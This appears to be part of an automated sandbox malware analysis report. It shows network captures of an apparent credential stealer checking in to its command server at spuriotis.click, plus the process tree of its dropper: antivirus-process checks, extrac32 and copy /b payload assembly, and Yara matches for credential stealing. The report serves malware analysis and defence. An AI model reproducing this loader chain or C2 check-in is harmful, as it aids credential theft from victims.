42 7b 26 05 db e3 ca b4 fa a9 e9 12 cd 39 91 55 0e 7f 52 fd b9 e4 63 cd 79 c7 cc e4 04 2f 6c 95 fe 3e b8 79 86 58 04 2e 51 39 Data Ascii: k/1_~py&\_w*Dig)K_5aWB;WgYz)!`}'5'}Jj^SV?LnHVfg!TO$[]F:'xb\\Ns3DcCzNP?0`&;?6gB{&9URcy/l>yX.Q9
2024-12-28 08:30:08 UTC	15331	OUT	Data Raw: b1 60 e4 35 0b a1 f6 a8 25 6c f4 44 79 8a 20 1c 0f 89 82 1f 50 5a d4 c7 be 85 fd 8b 0f 7f 0e 35 fb bf ae 57 f0 86 b2 0e 51 f9 d9 d2 bc 0f 29 da 0d 51 82 2c 4c 91 63 ef 46 17 a1 ce 2c 3d b5 2f e2 93 21 53 55 c4 d8 7f f0 e4 36 6c 7e 62 b5 4b 87 0c b5 4b 34 bf c0 18 4d 85 dd ee e9 54 52 b2 08 b1 75 dd 7e bc db 6f c0 5d 6d fb 11 7a 5e 4a f2 31 b3 86 30 0d e9 cb 3f df bc 0d 38 d0 1b cf cf 0b 18 55 aa 25 d8 d8 d4 45 d0 28 01 9b 37 11 85 1f 2e 94 81 8e e9 41 c8 e9 6c fd 68 6a e1 25 3e 02 8d a0 fc 34 11 b5 65 b3 24 33 14 09 8a 0a b4 b2 2b 0a d4 cf e5 14 04 e0 e7 a9 83 ad a8 ad d3 c5 00 3f f6 01 b7 a1 86 d9 ec a9 15 59 41 43 db 76 18 ee 6f aa af b1 e1 be f1 ff ca cb 30 da f8 e8 d5 c4 cc a8 3e fb d6 3f 75 23 d7 7f 90 67 c3 bc 39 c7 ab 34 e4 b2 bf da a7 7f 64 b7 65 Data Ascii: `5%lDy PZ5WQ)Q,LcF,=/!SU6l~bKK4MTRu~o]mz^J10?8U%E(7.Alhj%>4e$3+?YACvo0>?u#g94de
2024-12-28 08:30:12 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:30:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2n3h3f02pvd9mpaaa2ac1i5rva; expires=Wed, 23 Apr 2025 02:16:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOlLH9xUTn4WPD3o%2FK3Hi7NIXSRHtVu3g%2FhiIVlSawgH2takY9AHzYmcuMs7raKi8F4har9VGoX5WgNpdPq8ZD5WiSTqh1XWKIgLSWolZeRzimXXacuAzIKEYwCJDR9yFRk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902fc60e65c470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1489&rtt_var=561&sent=355&recv=568&lost=0&retrans=0&sent_bytes=2833&recv_bytes=576249&delivery_rate=1961047&cwnd=236&unsent_bytes=0&cid=eb0c046acc022b7c&ts=4054&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49830	172.67.128.184	443	5660	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:30:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: spuriotis.click
2024-12-28 08:30:13 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=7F7C4D63DBC452FCD9AC212D15D33917
2024-12-28 08:30:14 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:30:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5jjlqj84vtn0jrh02aj3h31ok9; expires=Wed, 23 Apr 2025 02:16:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qpN1UelAvubqN%2FUk9NQzG%2Bpl%2B%2Fy3UQvXqH%2FzfNIv7XdfvFKH%2B0v1H0lCaMBU4EiI5i5pI7dTkiqg8EMtltyK7Iba1vkwvVFvxxn6VE3YBMSH1UfwbTRGOSaXcEip32fQr1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f902fe8da614217-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1713&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=979&delivery_rate=1643218&cwnd=240&unsent_bytes=0&cid=7e1903bf122cfca6&ts=871&x=0"
2024-12-28 08:30:14 UTC	240	IN	Data Raw: 34 37 62 0d 0a 37 32 6f 5a 48 56 61 74 53 35 6f 45 37 6d 44 32 43 70 39 48 33 44 77 32 67 5a 32 48 42 7a 69 65 33 78 55 31 34 76 57 53 74 75 4b 30 45 54 74 37 49 6f 39 78 71 79 6a 4d 42 64 51 77 72 6d 76 2b 57 42 53 37 76 2b 42 47 65 39 4b 64 50 6b 79 49 77 74 62 75 68 4b 51 47 66 46 4d 31 38 57 53 73 56 49 63 30 73 6b 33 50 48 62 45 49 56 38 7a 4a 79 47 78 79 79 70 35 55 65 34 58 65 34 65 61 49 6f 54 31 76 55 42 36 61 4b 73 70 33 6f 41 53 46 65 38 6c 7a 37 55 5a 71 72 76 4b 73 54 58 58 54 68 69 78 59 67 4a 33 39 7a 71 2f 59 4f 33 56 51 46 2b 78 35 33 6a 4b 5a 53 37 39 4c 33 69 36 72 57 6b 58 75 74 76 41 32 43 2b 65 76 54 56 2b 36 70 62 6e 63 31 6f 51 64 59 58 64 6b 39 7a 37 64 62 71 73 61 68 6b 6e 4b 4d 4a 31 Data Ascii: 47b72oZHVatS5oE7mD2Cp9H3Dw2gZ2HBzie3xU14vWStuK0ETt7Io9xqyjMBdQwrmv+WBS7v+BGe9KdPkyIwtbuhKQGfFM18WSsVIc0sk3PHbEIV8zJyGxyyp5Ue4Xe4eaIoT1vUB6aKsp3oASFe8lz7UZqrvKsTXXThixYgJ39zq/YO3VQF+x53jKZS79L3i6rWkXutvA2C+evTV+6pbnc1oQdYXdk9z7dbqsahknKMJ1
2024-12-28 08:30:14 UTC	914	IN	Data Raw: 2f 55 64 48 76 77 7a 4e 53 39 75 64 74 64 6f 65 43 79 6f 4f 45 68 55 46 79 63 54 54 76 50 65 35 59 77 51 4c 43 58 50 4a 32 6c 46 6c 59 79 74 2b 78 53 41 43 6d 75 58 74 53 75 38 4c 2b 35 39 47 66 44 43 6c 55 47 63 45 69 34 45 71 70 4f 71 46 57 73 48 36 59 63 31 65 78 72 76 52 6a 51 65 36 48 64 46 6d 34 71 62 33 38 75 4b 49 53 56 43 6f 58 6e 53 6a 62 52 59 49 6b 33 54 71 30 43 34 35 54 41 72 50 5a 39 47 67 54 36 65 34 6d 54 4a 4b 74 2b 4f 79 79 78 41 42 34 65 6d 48 56 4d 64 56 65 6d 79 69 63 54 2b 55 33 6e 31 6c 42 77 4e 6e 65 56 30 72 61 36 33 4a 33 6f 62 6e 51 6e 5a 75 56 58 56 31 46 4d 4f 59 6e 2f 30 71 4e 50 4e 6b 38 7a 79 71 49 65 47 48 52 78 2b 6f 7a 57 65 32 4c 57 6c 6d 53 6f 64 50 33 72 49 68 42 61 6b 30 2f 36 67 72 54 64 36 5a 58 76 56 72 73 43 62 Data Ascii: /UdHvwzNS9udtdoeCyoOEhUFycTTvPe5YwQLCXPJ2lFlYyt+xSACmuXtSu8L+59GfDClUGcEi4EqpOqFWsH6Yc1exrvRjQe6HdFm4qb38uKISVCoXnSjbRYIk3Tq0C45TArPZ9GgT6e4mTJKt+OyyxAB4emHVMdVemyicT+U3n1lBwNneV0ra63J3obnQnZuVXV1FMOYn/0qNPNk8zyqIeGHRx+ozWe2LWlmSodP3rIhBak0/6grTd6ZXvVrsCb
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 33 32 64 31 0d 0a 34 78 76 6d 4a 70 54 35 59 58 42 6a 4b 59 4f 6c 55 68 79 47 33 51 2b 77 50 36 33 64 6d 38 74 50 6a 50 30 6e 49 36 79 52 50 76 74 72 39 6e 61 69 69 4a 30 41 6b 4f 38 38 6a 39 58 79 6a 56 71 64 6d 30 67 61 64 44 6e 4b 33 36 71 78 4f 65 64 2b 32 59 6c 4f 52 6d 72 6e 42 30 39 77 54 61 55 55 38 39 52 75 78 62 74 6f 4c 67 58 4c 31 64 59 5a 4a 63 65 76 59 2f 58 64 37 79 36 68 55 63 62 75 6c 34 50 4c 57 69 43 74 61 55 52 53 47 4d 76 41 7a 71 6a 69 51 51 66 4d 69 6b 6c 39 71 72 71 76 58 62 6d 7a 61 6d 45 56 76 6a 38 48 7a 2b 37 61 67 41 56 4e 4a 46 2b 77 46 2f 53 2b 64 4d 4a 39 4c 33 67 36 76 64 41 48 4b 7a 66 52 4a 58 4b 61 75 51 77 48 54 6a 38 36 5a 6a 63 51 67 56 46 41 50 6c 43 62 34 62 49 45 59 75 7a 7a 4f 4b 35 46 39 64 37 50 5a 73 58 41 54 Data Ascii: 32d14xvmJpT5YXBjKYOlUhyG3Q+wP63dm8tPjP0nI6yRPvtr9naiiJ0AkO88j9XyjVqdm0gadDnK36qxOed+2YlORmrnB09wTaUU89RuxbtoLgXL1dYZJcevY/Xd7y6hUcbul4PLWiCtaURSGMvAzqjiQQfMikl9qrqvXbmzamEVvj8Hz+7agAVNJF+wF/S+dMJ9L3g6vdAHKzfRJXKauQwHTj86ZjcQgVFAPlCb4bIEYuzzOK5F9d7PZsXAT
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 2b 70 6e 4e 72 71 7a 61 4e 63 61 31 6b 39 34 41 7a 4b 50 5a 38 34 74 31 72 76 46 2b 52 52 41 2f 65 72 38 48 46 32 31 6f 5a 2f 41 4c 4f 4e 2f 4f 36 52 67 52 35 77 51 58 6e 73 42 39 73 7a 74 6a 43 43 63 71 34 74 76 30 78 31 36 36 33 45 52 6d 4c 50 36 30 59 65 30 71 48 6f 38 5a 53 2b 45 48 46 33 62 73 41 63 30 6b 69 63 42 49 5a 76 72 51 2f 33 56 55 57 35 2f 4e 35 49 43 64 7a 74 56 6d 32 4b 6b 73 72 61 30 49 64 53 64 57 67 37 2b 68 48 37 59 4b 55 78 76 30 76 7a 50 34 56 34 65 2f 62 49 76 32 6c 50 72 75 35 44 5a 59 47 67 78 59 2b 79 73 30 56 56 4b 78 4c 70 4a 64 52 50 69 6c 6d 48 57 76 59 54 6d 48 74 52 36 39 72 6d 5a 6e 62 4d 37 46 70 35 67 4c 54 58 38 4b 71 49 57 33 4a 4e 50 2b 77 4b 31 6a 57 30 42 4a 42 44 30 69 4f 64 44 51 61 31 72 50 31 62 46 2f 48 30 58 Data Ascii: +pnNrqzaNca1k94AzKPZ84t1rvF+RRA/er8HF21oZ/ALON/O6RgR5wQXnsB9sztjCCcq4tv0x1663ERmLP60Ye0qHo8ZS+EHF3bsAc0kicBIZvrQ/3VUW5/N5ICdztVm2Kksra0IdSdWg7+hH7YKUxv0vzP4V4e/bIv2lPru5DZYGgxY+ys0VVKxLpJdRPilmHWvYTmHtR69rmZnbM7Fp5gLTX8KqIW3JNP+wK1jW0BJBD0iOdDQa1rP1bF/H0X
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 57 35 62 57 2f 45 31 67 71 47 2f 70 79 78 69 75 57 46 36 6f 6c 31 79 4b 75 65 41 4c 43 2f 72 4e 47 63 2b 75 32 51 51 4b 68 72 66 2b 41 73 61 67 47 66 31 67 34 34 43 2b 74 4e 71 46 58 70 48 72 64 48 71 39 49 65 2f 58 4b 39 46 73 58 77 76 41 6b 59 39 43 78 6f 63 4c 58 71 41 56 4b 57 32 2f 37 50 4d 35 39 67 68 71 48 63 39 35 78 6b 41 6c 2f 77 4e 48 58 55 31 62 64 68 57 64 54 68 49 4c 35 35 72 75 39 4c 30 6b 6f 5a 73 63 4f 34 30 61 41 56 36 6f 6c 2b 77 36 74 56 33 37 47 77 61 68 4b 51 4d 32 48 51 31 50 57 78 64 44 56 6f 35 30 64 54 6e 39 6a 78 53 54 33 59 4b 6b 72 73 54 2f 74 46 2b 73 45 57 2f 62 49 76 30 38 4e 38 59 38 6d 65 70 66 44 2b 4f 2b 33 6e 51 35 42 4b 78 2f 6f 4c 4b 4e 67 74 68 4f 37 59 4e 55 79 69 48 35 78 37 65 66 78 57 78 66 4a 68 57 4e 54 68 62 Data Ascii: W5bW/E1gqG/pyxiuWF6ol1yKueALC/rNGc+u2QQKhrf+AsagGf1g44C+tNqFXpHrdHq9Ie/XK9FsXwvAkY9CxocLXqAVKW2/7PM59ghqHc95xkAl/wNHXU1bdhWdThIL55ru9L0koZscO40aAV6ol+w6tV37GwahKQM2HQ1PWxdDVo50dTn9jxST3YKkrsT/tF+sEW/bIv08N8Y8mepfD+O+3nQ5BKx/oLKNgthO7YNUyiH5x7efxWxfJhWNThb
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 6d 41 4e 70 66 41 48 34 66 72 46 39 75 7a 4f 73 55 4f 38 49 76 31 4a 55 30 63 6e 66 61 67 48 77 6b 56 31 77 31 59 58 52 38 35 4b 64 4e 6a 5a 79 42 73 63 67 72 45 65 4e 41 6f 4a 54 78 6a 57 61 56 56 37 33 7a 4d 6c 6a 64 39 43 38 53 52 72 55 70 66 76 69 32 35 63 67 52 54 4a 75 6c 44 69 69 63 4b 55 38 32 56 44 48 42 70 31 36 51 4c 6e 75 36 58 4e 36 33 37 68 50 52 64 57 47 79 75 43 59 6d 79 68 76 63 6a 6e 6b 65 64 46 2b 72 53 71 7a 52 38 59 7a 73 45 6f 45 37 2b 53 30 61 6b 69 6d 74 45 31 70 7a 59 66 33 77 64 4f 72 42 54 4a 59 4c 2b 77 70 36 57 76 63 4a 72 70 6a 71 53 53 47 56 51 37 71 38 4f 52 50 57 73 36 54 52 6c 2b 2b 32 71 48 52 31 49 5a 65 55 7a 59 61 2f 77 72 65 58 62 34 53 73 6a 37 65 66 35 74 73 58 73 4b 72 37 32 70 77 72 59 35 37 5a 4e 65 50 7a 70 6d Data Ascii: mANpfAH4frF9uzOsUO8Iv1JU0cnfagHwkV1w1YXR85KdNjZyBscgrEeNAoJTxjWaVV73zMljd9C8SRrUpfvi25cgRTJulDiicKU82VDHBp16QLnu6XN637hPRdWGyuCYmyhvcjnkedF+rSqzR8YzsEoE7+S0akimtE1pzYf3wdOrBTJYL+wp6WvcJrpjqSSGVQ7q8ORPWs6TRl++2qHR1IZeUzYa/wreXb4Ssj7ef5tsXsKr72pwrY57ZNePzpm
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 48 4d 51 6e 7a 47 71 63 4e 38 71 6e 48 2f 4e 64 4b 39 35 5a 63 76 5a 73 46 73 58 31 4f 67 6b 51 72 69 43 77 6f 4b 4a 76 67 4a 73 58 79 37 68 41 4e 4e 48 74 67 65 63 66 4b 6c 31 68 45 74 45 79 2b 66 44 54 6c 72 53 68 55 77 43 72 36 65 68 31 59 54 62 4a 33 46 58 47 70 52 39 32 57 4c 62 55 4e 31 4e 70 69 32 2f 43 32 2f 76 30 4d 46 67 61 4e 71 34 56 30 4b 47 6d 71 4b 43 6c 59 49 77 55 53 6b 4b 67 67 50 5a 61 36 51 30 70 30 36 6e 49 2b 70 50 5a 75 76 77 34 46 73 58 2f 61 38 69 52 4b 79 64 78 66 6a 54 69 51 56 2b 54 69 53 63 65 50 39 7a 33 43 79 2f 61 2b 34 50 6d 58 4e 5a 39 4e 37 68 62 67 6a 50 6e 69 64 78 31 49 4b 35 2b 59 4f 72 48 6d 35 6e 4a 65 45 36 7a 7a 65 66 46 49 35 64 2b 79 48 72 54 56 6e 50 39 65 42 72 64 73 75 4f 59 41 65 49 73 4d 62 67 73 62 59 47 Data Ascii: HMQnzGqcN8qnH/NdK95ZcvZsFsX1OgkQriCwoKJvgJsXy7hANNHtgecfKl1hEtEy+fDTlrShUwCr6eh1YTbJ3FXGpR92WLbUN1Npi2/C2/v0MFgaNq4V0KGmqKClYIwUSkKggPZa6Q0p06nI+pPZuvw4FsX/a8iRKydxfjTiQV+TiSceP9z3Cy/a+4PmXNZ9N7hbgjPnidx1IK5+YOrHm5nJeE6zzefFI5d+yHrTVnP9eBrdsuOYAeIsMbgsbYG
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 51 4b 2f 54 65 6f 4b 5a 74 59 39 41 48 74 42 51 37 77 79 37 4e 4e 53 2b 75 77 50 6e 2b 52 6a 2b 72 6b 6a 6f 55 54 49 57 55 62 6d 78 72 63 63 36 55 47 67 48 69 75 44 4f 68 4b 66 65 54 45 39 45 39 4c 38 66 52 74 59 64 4b 78 79 75 4b 49 74 7a 6f 79 64 32 4c 41 66 4b 78 39 67 78 43 44 51 76 55 62 38 30 6c 45 30 73 7a 7a 62 6c 4c 47 74 6e 4e 73 70 62 48 48 33 6f 43 48 4b 45 35 74 59 70 6f 76 32 30 2b 43 42 62 68 57 73 44 57 46 53 33 58 79 38 2b 52 4b 55 4f 32 74 64 48 69 32 75 74 65 48 73 49 6b 4e 59 46 77 39 32 33 6a 31 54 4b 38 70 68 55 4b 72 50 34 68 4b 51 38 76 37 73 54 5a 77 7a 4f 70 2f 5a 61 2b 77 39 2f 36 50 78 44 4e 53 56 44 66 65 44 71 74 56 72 56 43 6d 50 75 67 73 70 6c 39 6b 73 71 72 62 4b 46 7a 4f 74 6c 35 4e 75 35 72 77 68 71 61 33 50 6e 4e 46 42 Data Ascii: QK/TeoKZtY9AHtBQ7wy7NNS+uwPn+Rj+rkjoUTIWUbmxrcc6UGgHiuDOhKfeTE9E9L8fRtYdKxyuKItzoyd2LAfKx9gxCDQvUb80lE0szzblLGtnNspbHH3oCHKE5tYpov20+CBbhWsDWFS3Xy8+RKUO2tdHi2uteHsIkNYFw923j1TK8phUKrP4hKQ8v7sTZwzOp/Za+w9/6PxDNSVDfeDqtVrVCmPugspl9ksqrbKFzOtl5Nu5rwhqa3PnNFB
2024-12-28 08:30:14 UTC	1369	IN	Data Raw: 63 71 41 65 37 63 4e 30 54 70 56 70 79 30 39 44 39 51 6c 37 53 6c 6c 49 4e 68 64 37 41 35 6f 2b 43 57 6c 35 42 65 65 41 67 31 45 4b 79 54 37 64 34 35 78 47 45 62 31 33 43 33 4d 31 6b 62 39 2b 6c 57 48 4f 79 76 36 72 34 72 71 34 72 49 57 6f 77 33 69 53 75 4d 4e 38 57 74 58 72 79 4c 59 31 77 48 65 75 70 36 31 52 41 38 75 6c 50 58 4c 57 63 6f 73 79 53 72 44 39 31 58 42 58 6a 47 2b 39 75 32 6c 53 42 54 75 6b 46 36 6e 64 63 36 50 66 51 63 33 50 32 6b 46 74 37 76 74 71 6c 2f 49 75 2b 50 6c 35 49 48 4d 4e 37 2b 30 69 55 4c 34 35 51 7a 44 65 64 64 77 61 71 35 66 46 74 56 64 2b 52 5a 6e 32 46 68 4e 33 79 72 4c 55 64 61 46 63 35 6e 52 4c 47 4b 35 30 76 76 47 37 53 48 59 5a 52 55 76 6e 79 34 45 6f 50 35 37 4e 63 62 4b 4f 42 36 49 43 56 78 43 5a 59 58 47 37 61 4c 66 Data Ascii: cqAe7cN0TpVpy09D9Ql7SllINhd7A5o+CWl5BeeAg1EKyT7d45xGEb13C3M1kb9+lWHOyv6r4rq4rIWow3iSuMN8WtXryLY1wHeup61RA8ulPXLWcosySrD91XBXjG+9u2lSBTukF6ndc6PfQc3P2kFt7vtql/Iu+Pl5IHMN7+0iUL45QzDeddwaq5fFtVd+RZn2FhN3yrLUdaFc5nRLGK50vvG7SHYZRUvny4EoP57NcbKOB6ICVxCZYXG7aLf

Target ID:	0
Start time:	03:29:23
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\CLaYpUL3zw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CLaYpUL3zw.exe"
Imagebase:	0x5d0000
File size:	7'045'120 bytes
MD5 hash:	CCF904B9AFA2515F1120932E4BD1F148
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:29:25
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Imagebase:	0x400000
File size:	1'062'983 bytes
MD5 hash:	A3E9A86D6EDE94C3C71D1F7EEA537766
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:29:26
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xc30000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 70%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:29:26
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:29:26
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:29:29
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa30000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:29:29
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x6f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:29:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa30000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:29:30
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x6f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:29:32
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 768400
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:29:32
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Reflect
Imagebase:	0xa10000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:29:33
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "cocks" Articles
Imagebase:	0x6f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:29:33
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:29:34
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\768400\Climb.com
Wow64 process (32bit):	true
Commandline:	Climb.com V
Imagebase:	0x4f0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:29:35
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x180000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 057A0A08 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

8gq, xrefs: 057A0C4F

Memory Dump Source

Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd

Similarity

API ID:
String ID: 8gq
API String ID: 0-1984363304
Opcode ID: 0d1f6e8688eac31fa6ece02b6052f3839e83887cd03b23cb20b8c023db6b5d20
Instruction ID: 9d118c0c4f7cbc69faa7c36b8d41586d51fe43471b7a9b06f140f89d514dce47
Opcode Fuzzy Hash: 0d1f6e8688eac31fa6ece02b6052f3839e83887cd03b23cb20b8c023db6b5d20
Instruction Fuzzy Hash: 9D61BF367002089FCB18EB78D49DB29BBA2BBC8304F558A69E40697395DF30EC45DB91

Function 057A0590 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2262471875.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_CLaYpUL3zw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bbbded5534bd9ef995404f5a97b34bb8407d7b6723da868d32d2a4867b86ad
Instruction ID: dee1dc7ba7729c330b2ec9fb232353a078b036d169e61fd981f902c9269a0969
